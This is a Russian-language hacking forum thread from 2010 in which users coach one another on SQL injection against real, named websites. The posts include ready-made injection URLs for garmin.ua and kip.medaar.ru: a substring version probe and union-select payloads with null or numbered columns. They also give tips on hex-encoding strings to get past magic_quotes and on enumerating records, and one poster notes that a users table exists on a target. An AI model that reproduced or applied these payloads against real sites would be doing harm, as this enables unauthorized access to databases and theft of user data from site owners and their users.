 |
|
16.03.2010, 09:09
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Nek1t
Вот тут заминка: username>'последнего полученного_значения'
Это ничего не дало - записи выводятся так же с первой и до 1024 символа.
И то, что username - строковый параметр, не влияет на операцию сравнения?
Если у тя magic_quotes_gps on то надо привести к hex строку.
можно посмотреть на поле id и использовать его(оно зачастую auto_increment)
|
|
|
16.03.2010, 16:58
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
|
|
|
|
16.03.2010, 17:57
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Nek1t
Все, разобрался, просто опечатался в запросе, а в hex знаю, что переводить надо.
Единственный вопрос, как быть с теми случаями, когда нет столбца с id?
так я ж говорю, просто в твоём случае использовать username
|
|
|
|
16.03.2010, 18:24
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Подскажите вот сайт:
http://www.garmin.ua/catalog/maps/?id=1163%27
Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
З.Ы. Слепые инъекции - это типа blind? |
|
|
|
16.03.2010, 18:31
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://www.garmin.ua/catalog/maps/?id=1163+and+substring(version(),1,1)=4
4-ая ветка, есть табла users |
|
|
|
16.03.2010, 18:33
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от CyberHunter
Подскажите вот сайт:
Я так понял, что это слепая инъекция. Т.е. количество полей возможно подобрать, так чтобы отобразилась страница 1163, но что делать дальше если нет принтабельных полей? Брутить? Если да то как это сделать?
З.Ы. Слепые инъекции - это типа blind?
Почему же она слепая????
Код:
http://www.garmin.ua/catalog/maps/?id=1163+and+1=2+union+select+null,version(),null,null,null,null,null,null,null+--+
Но версия всё равно 4ка
|
|
|
|
16.03.2010, 18:42
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Я так подумал, потому что не было ошибок 
Хотел спросить что делает вот это: "+and+1=2" ?
И почему вместо 1,2,3,... пишется нулл,нулл,... ?
|
|
|
|
16.03.2010, 18:44
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от CyberHunter
Я так подумал, потому что не было ошибок
Хотел спросить что делает вот это: "+and+1=2" ?
И почему вместо 1,2,3,... пишется нулл,нулл,... ? 1111+and+1=2 (false) даёт в резальтате false(типа как -1).
а null это типо отсутствие значения
|
|
|
|
16.03.2010, 18:50
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Seravin
1111+and+1=2 (false) даёт в резальтате false(типа как -1).
а null это типо отсутствие значения
Зачем его использовать непойму
-1 union select a,b --
Проще помоему =\
|
|
|
|
16.03.2010, 18:55
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Ctacok
Зачем его использовать непойму
-1 union select a,b --
Проще помоему =\ 1) это дело привычки
2)
Код:
http://kip.medaar.ru/prod.php?idsub=-1+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
Код:
http://kip.medaar.ru/prod.php?idsub=105+and+1=2+union+select+1,2,3,4,5,6+--+&idkat=20&idsup=1
(долго это искал чтоб показать)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
